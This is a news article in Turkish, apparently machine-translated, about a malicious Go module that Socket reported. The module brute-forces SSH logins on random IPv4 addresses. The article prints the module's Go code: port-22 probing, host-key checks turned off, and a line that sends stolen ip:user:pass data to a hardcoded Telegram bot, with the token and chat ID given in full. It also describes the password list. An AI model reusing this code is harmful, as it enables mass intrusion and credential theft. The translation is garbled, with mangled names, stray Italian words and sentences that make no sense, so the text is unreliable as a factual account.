Sicket Güvenlik Şirketi tarafından keşfedilen bir Go modülü, SSH Gates'e rastgele saldırılar gerçekleştirir, ancak sadece mevcut kullanıcıya değil, aynı zamanda Telegram Tool'un yazarına da başarılı olduğunu bildirir. Telegram-api HTTPS kullandığından beri yanlıştır çünkü sıradan web için bot kaçakçılığı gereklidir.
Go denul modülüne Golang-Radom-Ssh Nidone yay denir ve GitHub'da ve Ildienyway adı altında GO modülünün ekosisteminde bulunabilen bir BT forvetine kadar izlenebilir. Goshub'a ek olarak, GitHub sayfası, arka kapı veritabanı aracı ile Phpmyadmin-ALSO için bir kapı tarayıcısı ve bir Forcer Brutus gibi diğer araçları barındırdı. Bu arada, Illieryway web siteleri artık GitHub ve Go modüllerinde mevcut değil.
Malizia kodu ayrıntılı olarak
GoLang-Radom-IP-Sh-broodforce sürekli olarak rastgele IPv4 adresleri üretir ve bu nedenle korunmasız SSH hizmetlerinde paralel TCP bağlantı noktası 22'de tarar. Hostkeycallback kullanın: ssh.InsecureIgnoreHostKey()Sunucudaki kimlik denetimlerinden kaçınmak için. HIT durumunda, parazit yerel kullanıcı adının basit bir parola listesi ile kimlik doğrulama yapmaya çalışır. Başarılı bir kayıttan sonra Golang-Radom-SSH-Bruteforce, bilgisayarın IP adresini iletir ve verileri kaynak kodundaki sert bir telgraf bot koduna iletir ve kullanıcı başarısını bildirir. Böylece saldırı noktasında olabildiğince fazla kaplanıyor.
Socket, kodun bir bölümünü yayınladı ve yorumladı:
// Probe the host on TCP 22. If the port is reachable, launch brute forcing.
func IsOpened(host string) {
target := fmt.Sprintf("%s:%d", host, 22)
conn, err := net.DialTimeout("tcp", target, 2*time.Second)
if err == nil && conn != nil {
conn.Close()
go brute(host)
}
}
// Configure SSH to skip host key verification, then attempt user:pass.
sshConfig := &ssh.ClientConfig{
User: user,
Auth: []ssh.AuthMethod{ssh.Password(pass)},
Timeout: time.Duration(timeout) * time.Second,
HostKeyCallback: ssh.InsecureIgnoreHostKey(), // Skip server verification.
}
client, err := ssh.Dial("tcp", addr, sshConfig)
// On first success, send stolen credentials to the threat actor's Telegram.
data := addr + ":" + user + ":" + pass + "</code>"
http.Get("https://api[.]telegram[.]org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884&parse_mode=HTML&text=<code>" + data)
close(succ) // Signal success and exit.
Ayarlanan verileri başarıyla ilettikten sonra, Telegram-api yanıtları "ok": true Geçerli bir message_id Sohbet için 1159678884. Sabit kodlu çıktı noktası:
https://api.telegram[.]org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884
Socket.dev'e göre, jeton botu 5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY Şu anda hala yaşıyor. Telgraf botu gibi tanımlar ssh_bot @Ssshzxc_bot kullanıcı adı ile. Hedef sohbet 1159678884, @io_ping (aka gett) ile özel bir sohbettir. Jeton botları ve sohbetler aktifse, Goshelling her bir ilk erişimin verilerini formatta doğru bir şekilde gönderir ip:user:pass @Shzxc_bot bir @io_ping aracılığıyla.
Telegram botu eylemde: go-pest aktif (solda), sağda tehdit hesabındaki bilgiler.
(Resim: Socket.dev)
Çevrimdışı kelimeler listesi ile seyahat etmek
Go Denul modülü, statik kelimelerin kısa bir listesini içerir ve ağ üzerinden güncelleme veya erişim verileri almaz, böylece ilk hedefe kadar sessizdir. Kelimelerin listesi sadece iki normal ismi birleştirir: Kök ve Yönetici – zayıf şifre ve standart, örneğin toor, ahududu, diyet, alp, parola, QWERTY, sayısal diziler ve Webdadmin, Webmaster, Bakım, Teknoloji, Pazarlama veya Yükleme gibi rol terimleri.
Dannoso Go modülü, kullanıcı adının ve yöneticiyi zayıf şifre ile birleştiren Brutus SSH kuvvetlerinin bir listesi içerir.
(Resim: Socket.dev)
Prensip olarak, soket kodunuzdaki modülleri kullanırken tedarik zincirinin saldırılarını uyarır. Kullanıcılar, bunları her zaman dikkatlice incelemelidir, örneğin çevrimiçi olarak ele alınan sert sözleşmelerde, genellikle telgrafta.
(DSÖ)
Bir yanıt yazın